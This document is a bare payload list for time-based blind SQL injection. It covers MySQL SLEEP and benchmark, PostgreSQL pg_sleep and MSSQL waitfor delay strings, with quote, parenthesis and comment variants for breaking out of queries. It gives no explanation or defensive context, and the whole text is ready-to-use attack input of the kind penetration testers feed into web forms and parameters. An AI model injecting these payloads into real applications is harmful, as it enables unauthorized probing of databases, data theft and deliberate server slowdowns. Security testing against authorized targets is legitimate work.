|| SQLi – Payloads ||
-------------------------------
SLEEP(20)#
SLEEP(20)--
SLEEP(20)="
SLEEP(20)='
'\"
&& SLEEP(20)
&& SLEEP(20)--
&& SLEEP(20)#
' AND SLEEP(20) AND '1
'&& SLEEP(20) && '1
ORDER BY SLEEP(20)
ORDER BY SLEEP(20)--
ORDER BY SLEEP(20)#
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
or SLEEP(20)
or SLEEP(20)#
or SLEEP(20)--
or SLEEP(20)="
or SLEEP(20)='
1 or SLEEP(20)#
" or SLEEP(20)#
' or SLEEP(20)#
" or SLEEP(20)="
' or SLEEP(20)='
1) or SLEEP(20)#
") or SLEEP(20)="
') or SLEEP(20)='
1)) or SLEEP(20)#
")) or SLEEP(20)="
')) or SLEEP(20)=
AND (SELECT * FROM (SELECT(SLEEP(20)))AND '1'='1'
AND (SELECT * FROM (SELECT(SLEEP(20)))AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(20)))
AND (SELECT * FROM (SELECT(SLEEP(20)))--
AND (SELECT * FROM (SELECT(SLEEP(20)))#
pg_SLEEP(20)--
or pg_SLEEP(20)
or pg_SLEEP(20)--
or pg_SLEEP(20)#
1 or pg_SLEEP(20)--
" or pg_SLEEP(20)--
' or pg_SLEEP(20)--
1) or pg_SLEEP(20)--
") or pg_SLEEP(20)--
') or pg_SLEEP(20)--
1)) or pg_SLEEP(20)--
")) or pg_SLEEP(20)--
')) or pg_SLEEP(20)--
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#